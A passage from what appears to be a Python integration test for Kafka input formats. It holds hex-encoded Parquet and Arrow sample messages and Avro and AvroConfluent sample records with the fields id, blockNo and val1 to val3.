19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x
1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x
00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x
84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x
3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x
1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
            # It seems impossible to send more than one Avro file per message
            # because of the nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x
00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x
00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x
00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x0